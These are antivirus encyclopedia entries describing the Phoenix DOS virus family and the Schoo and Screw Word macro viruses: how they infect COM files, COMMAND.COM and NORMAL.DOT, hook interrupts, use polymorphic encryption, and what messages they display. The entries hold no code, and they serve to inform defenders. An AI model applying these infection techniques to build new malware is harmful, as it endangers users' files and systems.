Virus Database

Phoenix Family

Description Phoenix Family

These are very dangerous resident polymorphic parasitic viruses. They write themselves to the middle of COM files that are executed or closed. They write to the end of EXE files the trojan program that in some cases erases all information on installed hard disks.
"Phoenix.Proud,Live" infect COM files only, "Phoenix.Live.a" does not infect COMMAND.COM.
While infecting a COM file the virus reads the data from the middle of the file, saves it to the end of the file, and then overwrites the data in the file middle with its copy and writes Jmp-Virus command to the beginning of the file. While infecting COMMAND.COM the virus writes itself to the the stack area of COMMAND.COM, and the file length does not grow.
Infection of COM file Infection of COMMAND.COM file
+-----------+ +-----------+ +-----------+ +-----------+
¦ File ¦ ¦ File ¦ ¦COMMAND.COM¦ ¦COMMAND.COM¦
¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
+ - - - - - ¦ +-----------¦ + - - - - - ¦ +-----------¦
¦ ¦--+ ¦ Virus ¦ ¦ ¦ ¦ Virus ¦
+ - - - - - ¦ ¦ +-----------¦ + - - - - - ¦ +-----------¦
+-----------+ ¦ ¦- - - - - -¦ +-----------+ +-----------+
+-->¦ ¦
+-----------+

The viruses also hook INT 13h and then, depending on some preconditions, randomly rearrange bytes in information blocks being read from, and written to disks.
The viruses of the family for the first time uses two new methods. First, the viruses intercept DOS calls to the files by using INT 2Ah instead of INT 21h. Second, the viruses (except "Phoenix.Live.a") are polymorphic and do not have any constant mask (signature): the main part of the virus is encrypted, and a decoding program (32 bytes long) is selected from 204 possible variants (one have to bear in mind that these viruses have the following lengths: "Phoenix" - 1704 bytes, "Phoenix.Evil" - 1701 bytes, "Phoenix.Proud" - 1102 bytes).
The viruses contain the text strings:
"Phoenix": PHOENIX
"Phoenix.Evil": The evil that men do lives on and on and onall
"Phoenix.Proud": Proudly made in Sofia
"Phoenix.Live.a,b": Live after Death

Check other viruses! Be aware! Use Antiviral Software

Macro.Word.Schoo

Description Macro.Word.Schoo

This is an encrypted virus. It contains 7 macros:
Documents NORMAL.DOT
GRBack GetRid
AutoOpen AutoOpen2
FileSave FileSave
VerIdent2 VerIdent
FileSaveAs FileSaveAs
BJTradeMark BJTradeMark
ToolsSpelling ToolsSpelling

It infects the global macros area on opening an infected document. It infects files that are saved with new name.
The virus adds new commands to Word auto-correction:
school -> schoo'
recognize -> reckonize
recognized -> reckonized
assembly -> assemily
CHS -> Crowley High Schoo'

Since 28 of May 1998 the virus displays many MessageBoxes, for example:
Microsoft Word Virus Alert
Warning: The 'Big Johnson' Virus has been detected.

On 28 may 1998 it display the MessageBox:
Microsoft Word Virus Alert
Transferring control to virus subroutine:
Virus initializingall
It's the last day of school!

On all following days it displays the MessageBox:
Microsoft Word Virus Alert
Transferring control to virus subroutine:
Virus initializing...
School's out!

Macro.Word.Screw

Description Macro.Word.Screw

This macro virus contains 11 macros:
Documents NORMAL.DOT
ABC ABC
AO AO
AutoOpen
FileOpen
FileTemplates
FP FP, FilePrint
FSA FSA, FileSave, FileSaveAs
HLP HELP, HLP
SCR SCR
TMC ToolsMacro, ToolsCustomize, FileTemplates, TMC
ToolsMacro

It infects the global macros area on opening an infected document, but has an error - it copies nonexistent macros AE instead of AO. As a result this virus is able to replicate only once - there will be no AutoOpen macro in second generation.
On printing depending on the current time the virus pastes at the end of the document the text "SCREW VIRUS IS HERE" and replaces all sequences:
' a ' -> ' e '
' I ' -> ' Me '
'. ' -> ' !!! '

and restores them after printing.
The virus installs new ScreenSaver (Marquee), this saver will display the message:
You Are Infected With The Screw Virus!!!

Home